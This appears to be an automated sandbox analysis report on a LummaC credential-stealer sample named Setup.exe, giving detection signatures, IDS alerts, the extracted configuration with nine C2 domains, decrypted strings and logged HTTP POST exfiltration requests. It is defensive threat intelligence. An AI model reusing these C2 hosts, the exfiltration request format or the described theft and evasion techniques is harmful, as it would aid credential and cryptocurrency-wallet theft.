Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:	Setup.exe
Analysis ID:	1580132
MD5:	894026775541f481a5fcdf15927a09b7
SHA1:	9491c5cb341b8218ec15fbbc38bf510e2fae8f23
SHA256:	a663f996634c13f46267d6b4a226680090ae71d392db03628094c881302e531c
Tags:	exeuser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains executable resources (Code or Archives)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Setup.exe (PID: 6996 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 894026775541F481A5FCDF15927A09B7)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["curverpluch.lat", "shapestickyr.lat", "bashfulacid.lat", "wellofflyric.click", "manyrestro.lat", "tentabatte.lat", "wordyfindy.lat", "talkynicer.lat", "slipperyloo.lat"], "Build id": "hRjzG3--ALFA"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4c75b:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000003.2050988322.00000000005B6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2029575084.00000000005B6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2080291766.00000000005AC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Setup.exe PID: 6996	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Setup.exe PID: 6996	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Setup.exe PID: 6996	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 3 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T01:26:20.891357+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	188.114.96.6	443	TCP
2024-12-24T01:26:34.035084+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	188.114.96.6	443	TCP
2024-12-24T01:26:36.307707+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	188.114.96.6	443	TCP
2024-12-24T01:26:38.598523+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	188.114.96.6	443	TCP
2024-12-24T01:26:40.819229+0100	2028371	3	Unknown Traffic	192.168.2.4	49740	188.114.96.6	443	TCP
2024-12-24T01:26:43.285119+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	188.114.96.6	443	TCP
2024-12-24T01:26:45.356692+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	188.114.96.6	443	TCP
2024-12-24T01:26:47.039099+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	188.114.96.6	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T01:26:32.809139+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	188.114.96.6	443	TCP
2024-12-24T01:26:34.803614+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49736	188.114.96.6	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T01:26:32.809139+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	188.114.96.6	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T01:26:34.803614+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49736	188.114.96.6	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T01:26:44.072373+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49741	188.114.96.6	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: Setup.exe.6996.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["curverpluch.lat", "shapestickyr.lat", "bashfulacid.lat", "wellofflyric.click", "manyrestro.lat", "tentabatte.lat", "wordyfindy.lat", "talkynicer.lat", "slipperyloo.lat"], "Build id": "hRjzG3--ALFA"}

Multi AV Scanner detection for submitted file

Source: Setup.exe	Virustotal: Detection: 12%			Perma Link
Source: Setup.exe	ReversingLabs: Detection: 15%

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: bashfulacid.lat
Source: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: tentabatte.lat
Source: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: curverpluch.lat
Source: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: talkynicer.lat
Source: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: shapestickyr.lat
Source: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: manyrestro.lat
Source: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: slipperyloo.lat
Source: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: wordyfindy.lat
Source: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: wellofflyric.click
Source: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: hRjzG3--ALFA

Source: Setup.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.4:49742 version: TLS 1.2

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00474078 FindFirstFileA,FindNextFileA,FindClose,	0_2_00474078
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00461F78 FindFirstFileA,FindNextFileA,FindClose,	0_2_00461F78
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004520D0 FindFirstFileA,GetLastError,	0_2_004520D0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0049676C FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,	0_2_0049676C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00463504 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	0_2_00463504
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00463980 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	0_2_00463980
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00461F78 FindFirstFileA,FindNextFileA,FindClose,	0_2_00461F78

Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then jmp eax	0_2_02FC42C0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 5E874B5Fh	0_2_02FC829E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	0_2_02FA43BE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ebx+03h]	0_2_02FAA33E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ebp+2434928Ch]	0_2_02FAA33E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov esi, ecx	0_2_02FCA320
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], C7235EAFh	0_2_02FE031E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 2DA07A80h	0_2_02FE017E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_02FCC16E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 4E935B1Fh	0_2_02FC410B
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, edx	0_2_02FDE7EE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-12h]	0_2_02FC6797
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2Ch]	0_2_02FC870E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then push edi	0_2_02FAE4FC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_02FB85FD
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [esi+ebx*8], C50A68E6h	0_2_02FDC5EE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-702EAD2Bh]	0_2_02FB65E2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ebx, dword ptr [esp+50h]	0_2_02FCAAAE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_02FB6A7A
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-77E1E040h]	0_2_02FAAA4E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_02FCEBAD
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp al, 2Eh	0_2_02FC89BD
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], C72EB52Eh	0_2_02FDC94E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-702EAD3Fh]	0_2_02FB6EAB
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_02FA8C9E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_02FA8C9E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+06h]	0_2_02FD925E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_02FBD06F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, byte ptr [ebx+edx+20B50FDAh]	0_2_02FCD02F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_02FCD02F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ebx, eax	0_2_02FA713E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ebp, eax	0_2_02FA713E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+28h]	0_2_02FCB6DC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], E785F9BAh	0_2_02FCB6DC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov edi, dword ptr [esp+24h]	0_2_02FCB65D
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [esp+ebx+000001A4h], al	0_2_02FAB7E3
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov dword ptr [esp+28h], 4E46404Eh	0_2_02FCB756
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]	0_2_02FC374E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_02FCFA74
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov edi, eax	0_2_02FCFA74
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then add ecx, eax	0_2_02FC7A6B
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_02FCFA62
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov edi, eax	0_2_02FCFA62
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_02FCFA18
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov edi, eax	0_2_02FCFA18
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [ebx], cl	0_2_02FCDBC1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [ebx], cx	0_2_02FBDB0B
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_02FBDB0B
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then jmp eax	0_2_02FAB6FF
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then jmp eax	0_2_02FAB868
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-702EACABh]	0_2_02FB798A
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-099F9BB6h]	0_2_02FB595E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_02FCF934
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov edi, eax	0_2_02FCF934
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 71B3F069h	0_2_02FDFEEE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx]	0_2_02FABEEE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, edx	0_2_02FABEEE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	0_2_02FBFECE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 5E874B5Fh	0_2_02FD9EAE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [edx+ebx*8], BC9C9AFCh	0_2_02FD9EAE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then test eax, eax	0_2_02FD9EAE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov edx, eax	0_2_02FC3E32
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_02FD5FFE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov edi, edx	0_2_02FADFA1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx-04F30F77h]	0_2_02FCFDE7
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [edx], cl	0_2_02FCFDE7
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov esi, edx	0_2_02FA9DDE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49736 -> 188.114.96.6:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 188.114.96.6:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 188.114.96.6:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 188.114.96.6:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49741 -> 188.114.96.6:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: curverpluch.lat
Source: Malware configuration extractor	URLs: shapestickyr.lat
Source: Malware configuration extractor	URLs: bashfulacid.lat
Source: Malware configuration extractor	URLs: wellofflyric.click
Source: Malware configuration extractor	URLs: manyrestro.lat
Source: Malware configuration extractor	URLs: tentabatte.lat
Source: Malware configuration extractor	URLs: wordyfindy.lat
Source: Malware configuration extractor	URLs: talkynicer.lat
Source: Malware configuration extractor	URLs: slipperyloo.lat

Source: Joe Sandbox View	IP Address: 188.114.96.6 188.114.96.6
Source: Joe Sandbox View	IP Address: 188.114.96.6 188.114.96.6

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 188.114.96.6:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 188.114.96.6:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 188.114.96.6:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 188.114.96.6:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 188.114.96.6:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 188.114.96.6:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 188.114.96.6:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 188.114.96.6:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wellofflyric.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: wellofflyric.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9CYIVA85NA8CTJI3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18150Host: wellofflyric.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=92E1L8OPNHAWBGBOMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8777Host: wellofflyric.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6ZVL460MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20376Host: wellofflyric.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ACS0CA28XLGQ18CTLUKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1264Host: wellofflyric.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OWPLOHXQDR9TJN6OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1102Host: wellofflyric.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: wellofflyric.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wellofflyric.click

Source: Setup.exe, 00000000.00000003.2004288284.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Setup.exe, 00000000.00000003.2004288284.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Setup.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Setup.exe, 00000000.00000003.2004288284.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Setup.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: Setup.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: Setup.exe	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Setup.exe, 00000000.00000003.2004288284.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Setup.exe, 00000000.00000003.2004288284.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Setup.exe, 00000000.00000003.2004288284.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Setup.exe, 00000000.00000003.2004288284.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Setup.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: Setup.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: Setup.exe	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Setup.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: Setup.exe, 00000000.00000003.2004288284.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Setup.exe, 00000000.00000003.2004288284.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Setup.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: Setup.exe	String found in binary or memory: http://www.innosetup.com/
Source: Setup.exe	String found in binary or memory: http://www.remobjects.com/ps
Source: Setup.exe	String found in binary or memory: http://www.remobjects.com/psU
Source: Setup.exe, 00000000.00000003.2004288284.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Setup.exe, 00000000.00000003.2004288284.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Setup.exe, 00000000.00000003.1959563047.0000000003CEB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959809809.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959640450.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Setup.exe, 00000000.00000003.1959563047.0000000003CEB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959809809.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959640450.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
